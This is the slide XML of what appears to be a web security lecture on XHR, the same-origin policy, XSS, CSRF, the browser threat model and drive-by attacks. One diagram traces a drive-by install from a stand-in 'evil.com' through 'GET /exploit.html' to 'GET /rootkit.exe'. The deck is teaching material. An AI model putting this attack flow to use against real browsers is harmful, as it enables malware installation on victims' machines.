        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="426122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XHR Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="413" name="Shape 413"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1485987"/>
            <a:ext cx="10515600" cy="497328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&lt;div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id=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0" err="1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msg</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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</a:t>
            </a:r>
            <a:r>
              <a:rPr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&gt;&lt;/div&gt;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&lt;form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id=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0" err="1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xfer</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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</a:t>
            </a:r>
            <a:r>
              <a:rPr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&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:r>
              <a:rPr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&lt;/form&gt;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&lt;script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="35A327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lang="en-US"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	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$(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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'#</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0" err="1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xfer</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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).submit(</a:t>
            </a:r>
            <a:r>
              <a:rPr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function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lang="en-US" sz="20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form_obj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 {</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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lang="nn-NO"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		var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO" sz="2000" dirty="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>xhr = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO"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new XMLHttpRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO" sz="2000" dirty="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>();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lang="nn-NO"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		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO" sz="2000" dirty="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>xhr.open(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>‘POST’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO" sz="2000" dirty="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>‘/xfer.php’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO" sz="2000" dirty="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO"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 true</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO" sz="2000" dirty="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>);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lang="nn-NO"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		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO" sz="2000" dirty="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>xhr.setRequestHeader(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>‘Content-type’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO" sz="2000" dirty="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO"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nn-NO" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>‘application/x-www-form-urlencoded’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO" sz="2000" dirty="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>);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		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="20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xhr.onreadystatechange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= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>function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() {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			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>if 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lang="en-US" sz="20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xhr.readyState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== </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>4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&amp;&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="20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xhr.status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== </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>200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 {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				$(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="20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'#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1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msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="20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).html(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="20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xhr.responseText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			}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		};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		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="20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xhr.send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($(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>this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).serialize());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	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});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&lt;/script&gt;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7B6C36-3391-4AA3-B311-AD36FEA04EFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="945397" y="2603715"/>
            <a:ext cx="4370522" cy="596685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78BB36-6F2D-49A0-A644-47B05C158A42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1250196" y="3054457"/>
            <a:ext cx="8405247" cy="1013848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2EFC88-1B7F-4C7A-82B1-B9EC5FA4E19C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1250196" y="5372013"/>
            <a:ext cx="3166822" cy="506924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54526F-DFF5-4B1A-803C-E00E856F5CA5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1250196" y="3959773"/>
            <a:ext cx="5220346" cy="153437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XHR vs. SOP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31846"/>
            <a:ext cx="10515600" cy="4811550"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Legal: requests for objects from the same origin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>$.get(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>server.php?var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>my_val</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Illegal: requests for objects from other origins</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Why not?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>$.get(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘https://facebook.com/’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Work arounds for cross-domain XHR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>JSONP (old-school, horrifically unsafe hack)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>XDR and CORS (modern techniques)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="115646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Attacking Web Clients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Cross Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Cross Site Request Forgery (CSRF)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2886357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on the Client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browser stores a lot of sensitive information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Your browsing history</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Saved usernames and passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Saved forms (i.e. credit card numbers)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cookies (especially session cookies)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browsers try their hardest to secure this information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>i.e. prevent an attacker from stealing this information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>However, nobody is perfect ;)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24545059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4500" dirty="0"/>
              <a:t>Web Threat </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4500" dirty="0"/>
              <a:t>Model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Attacker’s goal:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Steal information from your browser (i.e. your session cookie for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>bofa.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browser’s goal: isolate code from different origins</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Don’t allow the attacker to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>exfiltrate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> private information from your browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attackers capability: trick you into clicking a link</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>May direct to a site controlled by the attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>May direct to a legitimate site (but in a nefarious way…)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15488520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 Model Assumptions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861314"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attackers cannot intercept, drop, or modify traffic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No eavesdropping, no monster-in-the-middle attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DNS is trustworthy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No DNS spoofing or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Kaminsky</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>TLS and CAs are trustworthy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No Beast, POODLE, or stolen certs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scripts cannot escape browser sandbox</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SOP restrictions are faithfully enforced</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="192104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Hypertext Transfer Protocol (HTTP)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Requests and Responses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Interactions with TCP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9075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Browser Exploits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05340"/>
            <a:ext cx="10515600" cy="53526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Browsers are complex pieces of software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Classic vulnerabilities may exist in the network stack, HTML/CSS parser, JS runtime engine, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Plugins expand the vulnerable surface of the browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[Flash, Java, Acrobat, …] are large, complex, and widely installed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Plugins execute native (x86) code outside the browser’s sandbox</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacker can leverage browser bugs to craft exploits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Malicious page triggers and exploits a vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Often used to conduct Drive-by attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Drive-by Download: force the browser to download a file without user intervention</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Drive-by Install: force the browser to download a file and then execute it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Often install Trojan horses, rootkits, etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="428056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Drive-by Install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241" y="4077297"/>
            <a:ext cx="1005227" cy="100522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9172708" y="3934416"/>
            <a:ext cx="1365649" cy="1485332"/>
            <a:chOff x="8803850" y="4570116"/>
            <a:chExt cx="1365649" cy="1485332"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="TextBox 5"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8903461" y="5655338"/>
              <a:ext cx="10565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evil.com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3850" y="4706001"/>
              <a:ext cx="893446" cy="89344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7617" y="4570116"/>
              <a:ext cx="641882" cy="641882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07" y="2689230"/>
            <a:ext cx="1245186" cy="124518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334322" y="2603937"/>
            <a:ext cx="2307333" cy="1473360"/>
            <a:chOff x="1334322" y="2603937"/>
            <a:chExt cx="2307333" cy="1473360"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="16" name="Curved Connector 15"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="11" idx="3"/>
              <a:endCxn id="4" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1460793" y="3311823"/>
              <a:ext cx="1161062" cy="765474"/>
            </a:xfrm>
            <a:prstGeom prst="curvedConnector2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334322" y="2603937"/>
              <a:ext cx="23073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1) Send malicious link to the victim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053255" y="2557770"/>
            <a:ext cx="6185338" cy="1693664"/>
            <a:chOff x="3053255" y="2557770"/>
            <a:chExt cx="6185338" cy="1693664"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="Freeform 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3053255" y="3023361"/>
              <a:ext cx="6185338" cy="1228073"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 6185338"/>
                <a:gd name="connsiteY0" fmla="*/ 1228073 h 1228073"/>
                <a:gd name="connsiteX1" fmla="*/ 1508235 w 6185338"/>
                <a:gd name="connsiteY1" fmla="*/ 161273 h 1228073"/>
                <a:gd name="connsiteX2" fmla="*/ 5044966 w 6185338"/>
                <a:gd name="connsiteY2" fmla="*/ 108722 h 1228073"/>
                <a:gd name="connsiteX3" fmla="*/ 6185338 w 6185338"/>
                <a:gd name="connsiteY3" fmla="*/ 1170267 h 1228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85338" h="1228073">
                  <a:moveTo>
                    <a:pt x="0" y="1228073"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="333703" y="787952"/>
                    <a:pt x="667407" y="347831"/>
                    <a:pt x="1508235" y="161273"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2349063" y="-25286"/>
                    <a:pt x="4265449" y="-59444"/>
                    <a:pt x="5044966" y="108722"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5824483" y="276888"/>
                    <a:pt x="6004910" y="723577"/>
                    <a:pt x="6185338" y="1170267"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="57150">
              <a:solidFill>
                <a:schemeClr val="accent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461485" y="2557770"/>
              <a:ext cx="35526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2) GET /exploit.html HTTP/1.1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1887200" y="4464266"/>
            <a:ext cx="753087" cy="753087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3247697" y="3187287"/>
            <a:ext cx="5896303" cy="1274354"/>
            <a:chOff x="3247697" y="3187287"/>
            <a:chExt cx="5896303" cy="1274354"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="Freeform 22"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3247697" y="3587397"/>
              <a:ext cx="5896303" cy="874244"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 5896303 w 5896303"/>
                <a:gd name="connsiteY0" fmla="*/ 874244 h 874244"/>
                <a:gd name="connsiteX1" fmla="*/ 4598275 w 5896303"/>
                <a:gd name="connsiteY1" fmla="*/ 143775 h 874244"/>
                <a:gd name="connsiteX2" fmla="*/ 1392620 w 5896303"/>
                <a:gd name="connsiteY2" fmla="*/ 59693 h 874244"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 5896303"/>
                <a:gd name="connsiteY3" fmla="*/ 832203 h 874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6303" h="874244">
                  <a:moveTo>
                    <a:pt x="5896303" y="874244"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="5622596" y="576888"/>
                    <a:pt x="5348889" y="279533"/>
                    <a:pt x="4598275" y="143775"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3847661" y="8016"/>
                    <a:pt x="2158999" y="-55045"/>
                    <a:pt x="1392620" y="59693"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="626241" y="174431"/>
                    <a:pt x="313120" y="503317"/>
                    <a:pt x="0" y="832203"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="57150">
              <a:solidFill>
                <a:schemeClr val="accent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868877" y="3187287"/>
              <a:ext cx="2653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3) HTTP/1.1 200 OK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184634" y="3780580"/>
            <a:ext cx="5859518" cy="933310"/>
            <a:chOff x="3184634" y="3780580"/>
            <a:chExt cx="5859518" cy="933310"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="Freeform 25"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3184634" y="4198695"/>
              <a:ext cx="5859518" cy="515195"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 5859518"/>
                <a:gd name="connsiteY0" fmla="*/ 515195 h 515195"/>
                <a:gd name="connsiteX1" fmla="*/ 1634359 w 5859518"/>
                <a:gd name="connsiteY1" fmla="*/ 36974 h 515195"/>
                <a:gd name="connsiteX2" fmla="*/ 4487918 w 5859518"/>
                <a:gd name="connsiteY2" fmla="*/ 84271 h 515195"/>
                <a:gd name="connsiteX3" fmla="*/ 5859518 w 5859518"/>
                <a:gd name="connsiteY3" fmla="*/ 499429 h 51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59518" h="515195">
                  <a:moveTo>
                    <a:pt x="0" y="515195"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="443186" y="311995"/>
                    <a:pt x="886373" y="108795"/>
                    <a:pt x="1634359" y="36974"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2382345" y="-34847"/>
                    <a:pt x="3783725" y="7195"/>
                    <a:pt x="4487918" y="84271"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5192111" y="161347"/>
                    <a:pt x="5525814" y="330388"/>
                    <a:pt x="5859518" y="499429"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="57150">
              <a:solidFill>
                <a:schemeClr val="accent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449612" y="3780580"/>
              <a:ext cx="35526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4) GET /rootkit.exe HTTP/1.1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216165" y="4962089"/>
            <a:ext cx="5859518" cy="905856"/>
            <a:chOff x="3216165" y="4962089"/>
            <a:chExt cx="5859518" cy="905856"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="Freeform 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="3216165" y="4962089"/>
